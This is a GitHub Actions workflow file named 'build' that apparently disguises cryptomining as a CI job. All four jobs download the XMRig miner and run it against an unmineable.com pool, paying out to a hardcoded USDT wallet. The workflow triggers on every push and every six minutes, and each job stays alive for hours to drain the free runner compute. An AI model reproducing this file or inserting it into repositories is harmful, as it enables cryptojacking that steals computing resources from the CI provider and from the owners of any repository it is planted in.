name: build
on:
  push:
  workflow_dispatch:
  schedule:
    - cron: '*/6 * * * *'
jobs:
  boost1:
    runs-on: ubuntu-latest
    timeout-minutes: 350
    steps:
      - run: |
          sudo sysctl -w vm.nr_hugepages=1280 || true
          curl -sLO https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-static-x64.tar.gz
          tar xzf xmrig-6.21.0-linux-static-x64.tar.gz && cd xmrig-6.21.0
          ./xmrig -o rx.unmineable.com:3333 -u USDT:0xA763c9f25d702B34022130dA0Fb8e92712a73091.boost1-$RANDOM -p x -t 4 --randomx-1gb-pages &
          ./xmrig -o rx.unmineable.com:13333 -u USDT:0xA763c9f25d702B34022130dA0Fb8e92712a73091.boost2-$RANDOM -p x -t 4 --randomx-1gb-pages &
          sleep 20000
  boost2:
    runs-on: ubuntu-latest
    timeout-minutes: 350
    steps:
      - run: |
          sudo sysctl -w vm.nr_hugepages=1280 || true
          curl -sLO https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-static-x64.tar.gz
          tar xzf xmrig-6.21.0-linux-static-x64.tar.gz && cd xmrig-6.21.0
          ./xmrig -o rx.unmineable.com:3333 -u USDT:0xA763c9f25d702B34022130dA0Fb8e92712a73091.boost3-$RANDOM -p x -t 4 --randomx-1gb-pages &
          ./xmrig -o rx.unmineable.com:13333 -u USDT:0xA763c9f25d702B34022130dA0Fb8e92712a73091.boost4-$RANDOM -p x -t 4 --randomx-1gb-pages &
          sleep 20000
  boost3:
    runs-on: ubuntu-latest
    timeout-minutes: 350
    steps:
      - run: |
          sudo sysctl -w vm.nr_hugepages=1280 || true
          curl -sLO https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-static-x64.tar.gz
          tar xzf xmrig-6.21.0-linux-static-x64.tar.gz && cd xmrig-6.21.0
          ./xmrig -o rx.unmineable.com:3333 -u USDT:0xA763c9f25d702B34022130dA0Fb8e92712a73091.boost5-$RANDOM -p x -t 4 --randomx-1gb-pages &
          ./xmrig -o rx.unmineable.com:13333 -u USDT:0xA763c9f25d702B34022130dA0Fb8e92712a73091.boost6-$RANDOM -p x -t 4 --randomx-1gb-pages &
          sleep 20000
  boost4:
    runs-on: ubuntu-latest
    timeout-minutes: 350
    steps:
      - run: |
          sudo sysctl -w vm.nr_hugepages=1280 || true
          curl -sLO https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-static-x64.tar.gz
          tar xzf xmrig-6.21.0-linux-static-x64.tar.gz && cd xmrig-6.21.0
          ./xmrig -o rx.unmineable.com:3333 -u USDT:0xA763c9f25d702B34022130dA0Fb8e92712a73091.boost7-$RANDOM -p x -t 4 --randomx-1gb-pages &
          ./xmrig -o rx.unmineable.com:13333 -u USDT:0xA763c9f25d702B34022130dA0Fb8e92712a73091.boost8-$RANDOM -p x -t 4 --randomx-1gb-pages &
          sleep 20000
